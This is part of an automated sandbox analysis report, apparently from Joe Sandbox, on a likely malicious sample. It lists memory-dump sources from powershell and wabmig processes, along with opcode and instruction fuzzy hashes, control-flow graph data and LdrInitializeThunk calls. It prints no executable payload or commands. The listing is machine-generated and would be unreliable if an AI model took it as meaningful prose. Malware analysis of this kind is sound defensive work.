                                                              • Opcode Fuzzy Hash: d330df46f91185f2b8b61c06100c8c473fb0f5bd004991633d9b89743f398db8
                                                              • Instruction Fuzzy Hash: 8E213BB570838AAFEB218B664C007723FA59FC3752F5589A7EC40DB6C2D5A98C45C361
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92da9dcf778425d12213fbc5baf5c25f66ade44f9e98897248dbc4e9352d60c2
                                                              • Instruction ID: c60a275811e388c4d66d2c99f36223ea73a75c362ec2bd618eba8a5c751edee0
                                                              • Opcode Fuzzy Hash: 92da9dcf778425d12213fbc5baf5c25f66ade44f9e98897248dbc4e9352d60c2
                                                              • Instruction Fuzzy Hash: A411E2F190530BDFC7208F6888007A6BBF0EF86293F99856ADC18DB251D7B4C981CB91
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 603a889493669228e46e086b92c217e61b75f29d50a030a21557f13d3fc27256
                                                              • Instruction ID: 0939dc9fbdde20d0d6ab82e5614557d5391776bb6407610b7560001e31c6ad68
                                                              • Opcode Fuzzy Hash: 603a889493669228e46e086b92c217e61b75f29d50a030a21557f13d3fc27256
                                                              • Instruction Fuzzy Hash: 24212E74A04209DFCB00CF98D980AAEFBB5FF89310B158499E909AB352C731FD51CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52a9808227ad4cb9f214f4b79bb17c78a0b1e75b31397b0da535b6cdc3fcd31e
                                                              • Instruction ID: 88a154125dc8a63f5704eb59794f025a2f676898d836e78ebcbdbdb595b040de
                                                              • Opcode Fuzzy Hash: 52a9808227ad4cb9f214f4b79bb17c78a0b1e75b31397b0da535b6cdc3fcd31e
                                                              • Instruction Fuzzy Hash: 6F11E030D4015CDBEF28EA94E5987ECB7B2AB4531DF18986AC011B61D0EB746A89CB15
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207288874.0000000004A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4a7d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: feabe9ba1b2faac7e6f0784c9a23738e4aa9fde5df45ffb914a4a4ab7d565536
                                                              • Instruction ID: f4baec086e313bd0183f75272502bbf4b2899ecafee186e89da6ab9704a2ba96
                                                              • Opcode Fuzzy Hash: feabe9ba1b2faac7e6f0784c9a23738e4aa9fde5df45ffb914a4a4ab7d565536
                                                              • Instruction Fuzzy Hash: 4301F7715043049AFB304F21DCC0B67BF98DF41625F18C029DC0A0B542C678A442C7B1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207288874.0000000004A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4a7d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4bc0d456190a3130fa2279c67c26a34bcda8824492ce66de932fb8d5ee3eee6c
                                                              • Instruction ID: 9f71a40def9f101ecb9a890eae2b55364056085dff95c5a9fcf76f0bc90cbe55
                                                              • Opcode Fuzzy Hash: 4bc0d456190a3130fa2279c67c26a34bcda8824492ce66de932fb8d5ee3eee6c
                                                              • Instruction Fuzzy Hash: 1A01717200E3C09FE7128B259C94B52BFB4DF43225F1D81DBD8888F1A3C2695849C7B2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 114bd15dced58f5de0cc615276ac63098c11fc876c60aaf34034da5a11604fc5
                                                              • Instruction ID: ac53ead9764e05a5003818fd4f420a6d115907d7532ee3ef05bba3cb258d129a
                                                              • Opcode Fuzzy Hash: 114bd15dced58f5de0cc615276ac63098c11fc876c60aaf34034da5a11604fc5
                                                              • Instruction Fuzzy Hash: 5BB012715051504FC241CB10C850480BF209F92104318C0CA94448B257CB23DE03C700
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207288874.0000000004A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4a7d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d831bdce581d3d1a4062f84c5c4faf796b09dc24e8c5e776c29d6a84b201c7ac
                                                              • Instruction ID: a96c64541961d1a109fa188e873ae48acc5983dfcc03c99609f6e31f275bd4e4
                                                              • Opcode Fuzzy Hash: d831bdce581d3d1a4062f84c5c4faf796b09dc24e8c5e776c29d6a84b201c7ac
                                                              • Instruction Fuzzy Hash: 8D21FFB6604340EFDB24DF14DDC0B26BF65FF88324F24C669E8094B246C336E456CAA2

Execution Graph

Execution Coverage: 20.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 141
Total number of Limit Nodes: 1

[Execution graph: rendered node/edge data omitted. Entry node 94e018 -> 94e024 fans out to a series of blocks in the 25d428bd-25d42968 range; each of them reaches 25d42a56 and calls into 25d4992c (LdrInitializeThunk) and 25d49548 (2 API calls, both resolving to LdrInitializeThunk at 25d4957e and 25d49a69).]

Control-flow Graph

[Control-flow graph for the function at 25d49548-25d49b90: rendered basic-block edge data omitted. LdrInitializeThunk is called from blocks 25d4957e-25d49614 and 25d49a69-25d49a7f; block 25d49970-25d499d1 calls 25d49328.]
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5ae1727ef07211577fac37e3782096c1d9c8202ba1e9d6b8ffae61e638a3a9a0
                                                              • Instruction ID: 5ad88de90dd7a2ed911dbb87056f663a1abb4cadd7e67e1fcedce30a3c2f5653
                                                              • Opcode Fuzzy Hash: 5ae1727ef07211577fac37e3782096c1d9c8202ba1e9d6b8ffae61e638a3a9a0
                                                              • Instruction Fuzzy Hash: 20F1C474E01218CFDB14DFA9C884B9DBBB6FF88304F1481A9E448AB355DB75A986CF50

Control-flow Graph

[Control-flow graph for the function at 25d40b30-25d41733: rendered basic-block edge data omitted; no resolved API calls in this function.]
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: j"
                                                              • API String ID: 0-1479328248
                                                              • Opcode ID: cf41928d5a1945eab707f07f799798b02e0cef7a0515a0323ca92f147922de8f
                                                              • Instruction ID: ca642c17bdd2d8d4d7ca3538315dc23ef4726e41434c41f72f9d1b5aa6d817df
                                                              • Opcode Fuzzy Hash: cf41928d5a1945eab707f07f799798b02e0cef7a0515a0323ca92f147922de8f
                                                              • Instruction Fuzzy Hash: CE72AE75E052298FDB64DF69C980BE9BBF2BB89300F1481E9D449A7351DB34AE81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17829a40e99c388587c61fa755bf2531acd4cf0cc7636a5ebd6fae9bf5ddeb70
                                                              • Instruction ID: e71c998d0a13e2ddec50d4fb148bd1047964b4393139c981165533fe743788f8
                                                              • Opcode Fuzzy Hash: 17829a40e99c388587c61fa755bf2531acd4cf0cc7636a5ebd6fae9bf5ddeb70
                                                              • Instruction Fuzzy Hash: A1126D70B002199FDB15DF69C854BAEBBF6BF89300F208569E806EB395DB349D41CB91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c251291c4828b844d2212e58edf5e1900ea92cb164d4a5f788c6e85931e2cb15
                                                              • Instruction ID: cdb0941564c5c17f97cd0d8a7f33d41cac83b1659a4361841d5dea395028e345
                                                              • Opcode Fuzzy Hash: c251291c4828b844d2212e58edf5e1900ea92cb164d4a5f788c6e85931e2cb15
                                                              • Instruction Fuzzy Hash: 30025D30A08259DFCB15CFA8C984EAEFBB6BF89304F158469E815AB361D735ED41CB50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a64d478e5d50692d26446b4b8b72746110ba99887c51b45e1567a610c596a559
                                                              • Instruction ID: 443e35a54788ffe7f5f3ac82f536dbf375c2bc2721ebafd44feb11954b4a8f87
                                                              • Opcode Fuzzy Hash: a64d478e5d50692d26446b4b8b72746110ba99887c51b45e1567a610c596a559
                                                              • Instruction Fuzzy Hash: 79F16F34F08219CFDB18DFB5C854AAEBBB2BFC9700B148569E406E7395DB359802DB51
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76f91d06b359606dc1591474731b9d4731c6a587ccece2f5994d1851c8abd827
                                                              • Instruction ID: 7ba0662fbb83d7f5b1df469e5e1853ed8394c6908322e7e1625990d071701e7b
                                                              • Opcode Fuzzy Hash: 76f91d06b359606dc1591474731b9d4731c6a587ccece2f5994d1851c8abd827
                                                              • Instruction Fuzzy Hash: 99C1AF75E00218CFEB14DFA5C944B9DBBB2FB88301F2481A9D809AB395DB359E85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f2e583713ec6e60d78a455777ca00b1611d5472cd1423aeeea2c1025be95caa5
                                                              • Instruction ID: cf875491da823c97431bba6da79f8e380cee8fcc89f6ecec4872b51a2e481e1a
                                                              • Opcode Fuzzy Hash: f2e583713ec6e60d78a455777ca00b1611d5472cd1423aeeea2c1025be95caa5
                                                              • Instruction Fuzzy Hash: D4A1E5B5E05258DFDB54DFA9D884A9DBBF2BF89300F14806AE409EB362DB749841CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad5e27365d485c78c44040d645ebbec07673e9e86a4587360b15db859b1333ff
                                                              • Instruction ID: 7b61bfbd6c39627196b5a0647eb7dbd1d9247f7ad5f7b2f892fe2e261b5c9314
                                                              • Opcode Fuzzy Hash: ad5e27365d485c78c44040d645ebbec07673e9e86a4587360b15db859b1333ff
                                                              • Instruction Fuzzy Hash: EFA1F470E002088FEB10DFA9C944B9DBBB1FF89314F208269E509BB3A1DB759985CF55
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 770ec255e90d79e80ee06a7bc770955135a195bbdfb1c6334acc838d943fb3c3
                                                              • Instruction ID: 03c49b538f3ea01e9a96a9d1c2a20bb903b136f968199b94b60717228b2fde1e
                                                              • Opcode Fuzzy Hash: 770ec255e90d79e80ee06a7bc770955135a195bbdfb1c6334acc838d943fb3c3
                                                              • Instruction Fuzzy Hash: ACA1F470E002088FEB10DFA9C984B9DBBB1FF89314F208269E509BB391DB759985CF54
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21a96edb9a9558686aa9ca7ad18c53c8cad8c5566db4a6a2a4b7b3515facd5f5
                                                              • Instruction ID: 71280ee6bda434406b3635ae9efad60a75b9bdfb024e2da36aef64e60c15d097
                                                              • Opcode Fuzzy Hash: 21a96edb9a9558686aa9ca7ad18c53c8cad8c5566db4a6a2a4b7b3515facd5f5
                                                              • Instruction Fuzzy Hash: 0D91E470E00208CFEB10DFA9D884B9DBBB5FF89310F208259E509BB291DB759985CF55
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe0167eed24efaf584c00a89dde18ad16d1861a434149bff796e5e7631915b8e
                                                              • Instruction ID: 9c2f9f1365988b339c15df39236110c6e63d783f45d3abed5136b763df82d19d
                                                              • Opcode Fuzzy Hash: fe0167eed24efaf584c00a89dde18ad16d1861a434149bff796e5e7631915b8e
                                                              • Instruction Fuzzy Hash: D881A4B5E01218CFEB14DFAAD984B9DBBF2BF89304F248069E419AB365DB345945CF10
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33e5789a33fcca84c4d4241440bf259121e04d493eb64f9871a87fb448028f16
                                                              • Instruction ID: 6d0d736ff2b45d1b74ffa063436384ed77a6fcd75a21969f158c06f506e48279
                                                              • Opcode Fuzzy Hash: 33e5789a33fcca84c4d4241440bf259121e04d493eb64f9871a87fb448028f16
                                                              • Instruction Fuzzy Hash: 6B8193B4E01218CFEB54DFAAD884A9DBBF2BF88301F14C069E419AB365DB345941CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 03090a23cf69d7fa6bfd66e514bcbdb0173ea9b7cc178e70a8f759c256f0e145
                                                              • Instruction ID: b46f8667c8315d446686d9633cfee00edc1028c3b7dbb9503cb4219796a72478
                                                              • Opcode Fuzzy Hash: 03090a23cf69d7fa6bfd66e514bcbdb0173ea9b7cc178e70a8f759c256f0e145
                                                              • Instruction Fuzzy Hash: DF81A3B4E01218DFEB54DFA9D884A9DBBF2BF88300F24C069E419AB365DB345985CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e971aa9e88719733d0f9681d72a9c48565dbd36ce2594b4b62ed343a7f864139
                                                              • Instruction ID: 766beebe066cff79659b96cb088a9d40fb65439cc6e6b454796191cfc0d8381c
                                                              • Opcode Fuzzy Hash: e971aa9e88719733d0f9681d72a9c48565dbd36ce2594b4b62ed343a7f864139
                                                              • Instruction Fuzzy Hash: AE8192B5E01218DFEB54DFA9D984B9DBBF2BF88300F248069E419AB365DB345941CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc4fc034469609fc7a1396b740f2202fa9d6035b79b754021916d6ff60e66763
                                                              • Instruction ID: efa7d19e5d1e59b26d9ba11d46232a5890159cb3fadb788c5f7a8ddef4936f4e
                                                              • Opcode Fuzzy Hash: fc4fc034469609fc7a1396b740f2202fa9d6035b79b754021916d6ff60e66763
                                                              • Instruction Fuzzy Hash: FD81A374E05218CFEB18DFA9D984B9DBBF2BF89300F148069E819AB365DB345945DF10
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ed7f353823903bfae75c63f173482ea40e41433c4c0e9d0b8c44113526f60bc
                                                              • Instruction ID: f0e29454f316427138ede4cb9923bc46293640fa7f4586f848fad817c9f3ecf7
                                                              • Opcode Fuzzy Hash: 3ed7f353823903bfae75c63f173482ea40e41433c4c0e9d0b8c44113526f60bc
                                                              • Instruction Fuzzy Hash: 4161C375E006189FDB14DFEAD984A9DBBF2BF88300F15C069E818AB366DB349941CF10
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c239c4212ecbee37f8df393c61a4012720df0c874d8906eee0ff9e402b10d807
                                                              • Instruction ID: 192f6f4f9563b4901eb06df5058a251fdce1319330e581a220396288049f8aa8
                                                              • Opcode Fuzzy Hash: c239c4212ecbee37f8df393c61a4012720df0c874d8906eee0ff9e402b10d807
                                                              • Instruction Fuzzy Hash: 2E519375E00208DFEB18DFAAD894A9DBBB2FF89301F24C129E815AB364DB345841CF14
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e75946c50f05907345839c866b73231ff158751c791dfb0cd359c0e1f3232449
                                                              • Instruction ID: 1e4900e1c1c539bd5ea0b06209e60838926b81118e466cc4ef3253ac02b30020
                                                              • Opcode Fuzzy Hash: e75946c50f05907345839c866b73231ff158751c791dfb0cd359c0e1f3232449
                                                              • Instruction Fuzzy Hash: DE519575E00208DFEB18DFAAD894A9DBBB2FF89701F24C129E815AB365DB345841CF14

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 25D49A6E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3409695c5444bf68846d9913ce13e3b04d40725f7b8e567ddc23462724aaf38d
                                                              • Instruction ID: 923650695369999d185a29ce5c6e18b02665c5e3093ce5a8661c9d73d1a94746
                                                              • Opcode Fuzzy Hash: 3409695c5444bf68846d9913ce13e3b04d40725f7b8e567ddc23462724aaf38d
                                                              • Instruction Fuzzy Hash: 05112974E002198FDB04DBAAD885EADB7F9FB88304F148169E848E7346D731AD41CB60

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P"
                                                              • API String ID: 0-36892166
                                                              • Opcode ID: 8cb5c8d47131aac2ab29dc8c5b666935ecc7ad2b611aed91089601e3d03dab57
                                                              • Instruction ID: 723993b52a398fea06fb6973a84b006691238356350cc695e55724f8699c6789
                                                              • Opcode Fuzzy Hash: 8cb5c8d47131aac2ab29dc8c5b666935ecc7ad2b611aed91089601e3d03dab57
                                                              • Instruction Fuzzy Hash: 1D2143363046528FC7299F29C46892EBBA6AFCA751714856DE806CB394CF35CC028B81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c"8c"dc"
                                                              • API String ID: 0-2109075657
                                                              • Opcode ID: edaafe189461f361e2ac53b84bff3c9bf9fda43347fb3079e74d89ed10d63e17
                                                              • Instruction ID: 0c7ebc73434314679bd74416d1cc4b580a1d0241f5b216ed4d3de1fc60cae4f6
                                                              • Opcode Fuzzy Hash: edaafe189461f361e2ac53b84bff3c9bf9fda43347fb3079e74d89ed10d63e17
                                                              • Instruction Fuzzy Hash: F2218E71E00209DFDB01EFB8D850B9DBFB1FB85300F0085A9D4189B2A5EB744A45DF81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c"8c"dc"
                                                              • API String ID: 0-2109075657
                                                              • Opcode ID: 169d41dfc843b1560c3c16a260a9f3789fbbea08d9e755f7c87881ad1b2109e8
                                                              • Instruction ID: 1311929eb417a741ca6f517beebec5d99160d9e35964a821b8ce508512b198e9
                                                              • Opcode Fuzzy Hash: 169d41dfc843b1560c3c16a260a9f3789fbbea08d9e755f7c87881ad1b2109e8
                                                              • Instruction Fuzzy Hash: EB110A71E00209DFEB04EFA8D950B9EBFF6FB84301F10C5A9D018AB255EB749A459F81
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d8083bee645ef7f10b3e0c1387e631c3648ee15884329f6b37eb99d9b63b101
                                                              • Instruction ID: c586d4fa7562d8ec050fc49c145bdb29672f6e5beffb3e49de74716a6e1dd830
                                                              • Opcode Fuzzy Hash: 1d8083bee645ef7f10b3e0c1387e631c3648ee15884329f6b37eb99d9b63b101
                                                              • Instruction Fuzzy Hash: 8912A9B65A53568FD3402F74D5BC06A7E62FB4F323705AE20E98BC2059DF7A0448CBA5

                                                               Control-flow Graph (rendered graph; entry block 94e018; legend: Executed / Not Executed; node and edge list omitted)
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3271aa3e666f7e450720ba3a6155b62bbbcf88bded36844c64e5372c7c0b44dc
                                                              • Instruction ID: 1cd91e20c443bd10eeb47e5735a0a92e582b303f0d9bacc902c2be458f616977
                                                              • Opcode Fuzzy Hash: 3271aa3e666f7e450720ba3a6155b62bbbcf88bded36844c64e5372c7c0b44dc
                                                              • Instruction Fuzzy Hash: 7F12A9B64A57578F93402F74D5BC06A7E62FB4F323705AE20E98BC2059DF7A0448CBA5

                                                               Control-flow Graph (rendered graph; entry block 940c8f; legend: Executed / Not Executed; node and edge list omitted)
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10afa8fce904b511a5ea46bba650837187a3d99623eb552c7f2306b6aee5743a
                                                              • Instruction ID: 51df22cefd7e1e052ea0f295df204537a6466effe936ca7d3d00f64f9858e9a2
                                                              • Opcode Fuzzy Hash: 10afa8fce904b511a5ea46bba650837187a3d99623eb552c7f2306b6aee5743a
                                                              • Instruction Fuzzy Hash: DC52D975A10219CFCB54EF68DD95B9DBBB2FB98301F1086A9D809A7364DB346D81CF80

                                                               Control-flow Graph (rendered graph; entry block 940ca0; legend: Executed / Not Executed; node and edge list omitted)
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 51495fa2fd3336ca4151b1d79c4d2abb497608d59bc029dd5ffcebcccc3bd01e
                                                              • Instruction ID: 15f764acc3a29745c48c7baf287121f1217fd138901bdff85eb3b5954600bba2
                                                              • Opcode Fuzzy Hash: 51495fa2fd3336ca4151b1d79c4d2abb497608d59bc029dd5ffcebcccc3bd01e
                                                              • Instruction Fuzzy Hash: 3052D975A10219CFCB54EF68DD95B9DBBB2FB98301F1086A9D809A7364DB346D81CF80
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29c3d10db632c0ffeaea922efc58aba6e3367c7d85bc4a0d67443e395fee2f1b
